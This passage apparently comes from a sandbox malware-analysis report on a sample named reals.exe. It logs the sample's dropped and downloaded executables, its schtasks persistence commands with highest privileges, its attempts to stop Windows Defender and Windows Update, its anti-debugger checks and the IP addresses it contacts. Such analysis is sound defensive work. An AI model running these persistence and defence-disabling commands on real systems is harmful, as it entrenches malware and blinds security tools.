cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\jlzfI3MOMBv1vbp25nBj.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\y3p6n3ne22r3BFOUsYqb.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\a77VWg3R2bV_Qy103LSX.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\PDbNNj6OmrILaV3JtHH1.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\a77VWg3R2bV_Qy103LSX.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\jlzfI3MOMBv1vbp25nBj.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\y3p6n3ne22r3BFOUsYqb.exe
file	C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\PDbNNj6OmrILaV3JtHH1.exe
file	C:\Users\test22\AppData\Local\Temp\00c07260dc\explorgu.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 19, 2024, 7:49 a.m.	thread_identifier: 2684 thread_handle: 0x00000150 process_identifier: 2680 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000014c	1	1
CreateProcessInternalW Feb. 19, 2024, 7:49 a.m.	thread_identifier: 2768 thread_handle: 0x00000158 process_identifier: 2764 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000154	1	1
CreateProcessInternalW Feb. 19, 2024, 7:50 a.m.	thread_identifier: 2512 thread_handle: 0x000005a4 process_identifier: 2516 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000005b0	1	1
CreateProcessInternalW Feb. 19, 2024, 7:50 a.m.	thread_identifier: 2584 thread_handle: 0x0000062c process_identifier: 2580 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000061c	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x006d0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process reals.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile Feb. 19, 2024, 7:50 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL4Òeà"¬ RwÀ @`²@@@d\|@ äà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcä@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 19, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $*Rän3@n3@n3@5[A`3@5[Að3@»^A\|3@»^Az3@»^A3@5[Az3@5[A}3@n3@º3@õ]Ao3@õ]u@o3@õ]Ao3@Richn3@PEL²¿eàÜPIð@I)ë@Vpj`ØÔ7I7I PÖ@à.rsrcØ`æ@À.idata pê@À )ì@àuqbwsevc@0>î@àvrfuibcm@I,@à.taggant0PI"0@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 19, 2024, 7:50 a.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ E `@ ÀEs`m`ø @ @à.rsrc`2@À.idata 6@À 8@àqwrdbxgo`@+T:@àlfgvsqpj E@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 19, 2024, 7:50 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELþ~Ìeà"¬>´@±À@`±@ 0¾ à=x 0°4@àpÀ"8@à@0Z@àpb@àdb@à.rsrcÆ@@àx (Ô @à.data`"V"ü@à/ãEcéÆãqíÊçcmÕ )oP:ä¥&m`$br³ÃNqÐ»ùÐ-³W ¯F ¢B' 0ßJ´#ü2åOfôdP±=\|R¾8¬£liÃ¢eÀ·:ï ½ke $N{êÏuDPÜþîu£`z&þö \Vôjþ`ìó°p£RùÇºÊÎ²hÈiß&VïSrRSâÝrü,YE-ÊOãvb¢6ôSýXÄM¤`ÀðÐÒ÷tiÍRCã'üôÐºÀ\|5u6cfO¦Äà.ðg:§¥P^ %®(ÒFÒêËPÙO\Ú<³q5_éÝ Ñæ&H¨u[ú'¬ùØ¤Ë²tx¦>üs/»®Q1AÅetÝ#$ù:\|A¡º÷tæÄ# £¤æø¤+õLÇ°Dy,1fIæ<«Ç4hOÊúýûS%²âMâÏ~&!'Íl=gµ!²¾8½ï½ð~}Ã>aùÔið0î\|zÎÐ\~ÎÙÃãog\|uÛ!©;La ¬ª ÌOÂ_ëZYª¾?f±òºE#L{ ÆS28¡6Ä ÓÝÅî^Ö¦Q=¾kwN>Wg~? h¶(ÈÝS{õupÈeÀÁj\o~`p 'ð¨qs2²¨r#Âän«î×ÜÉVg1Z8©§çùm¸\|qµSì2~è<¶JmVS¬¿Æîn89z#Qõ-ÛÒ02ÉéÔ¸1¦n»£,®:êiÌòqPÖÌ«Éµ4äSÖ&UVÄ«Pm¼ca»EöòÝí^Adé·dAõÚ`wqûïÛÑ°¶b ±Ã(v¹GsM·~ Ò«åµUáÿ×¯Òê©¼¨ehÇ£ Ò2ÔÔ÷6kò¿0Dª¶O_·»îÈeéÀ¡(C(idüD¶qdwª\rTè'Óèù(Îð ?îØöÖüxÚzÙ¤yM§ª&ñ=ªAë¾sXHli³s¼êFTRQë7Ò·%©S×¢õK¶QÏ²P.®>EÉL?¸t²#8ZÜ:¾[9uZhOH×6÷>d÷dªôÞùÄÚs'ªæË: !Ía:M)à¦jþõËlÚv2Ìí¶½ #Ñ9ÿmÌì½I_47hTG§wOãë&a@$ eÑe]ów³+FÄÅÐ1¡¼(E·*ßÍ-æ^5Vs/ý Ê¸5Ó¦³Î9 request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 19, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"V[°@@[¸$@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À `,À @àghmhjklaà @à @àbmzgrwqf[î#@à.taggant0["ò#@à request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000179b0', u'virtual_address': u'0x0015c000', u'entropy': 7.997039360959805, u'name': u'', u'virtual_size': u'0x00018000'}

entropy

7.99703936096

description

A section with a high entropy has been found

entropy

0.58047163921

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 19, 2024, 7:50 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (2 events)

process	reals.exe
process	system

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000044c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 19, 2024, 7:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2988 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	185.215.113.46
host	193.233.132.62

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 19, 2024, 7:50 a.m.	service_handle: 0x003771f0 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 19, 2024, 7:50 a.m.	service_handle: 0x0037cfd8 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 107 events)

Time & API	Arguments	Status	Return
FindWindowExW Feb. 19, 2024, 7:49 a.m.	class_name: OLLYDBG child_after_hwnd: 0x00000000 parent_hwnd: 0x00000000 window_name: OllyDBg	1	459128
FindWindowW Feb. 19, 2024, 7:49 a.m.	class_name: WinDbgFrameClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: OLLYDBG window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: GBDYLLO window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: pediy06 window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: FilemonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: RegmonClass window_name:		0
FindWindowA Feb. 19, 2024, 7:50 a.m.	class_name: RegmonClass window_name:		0
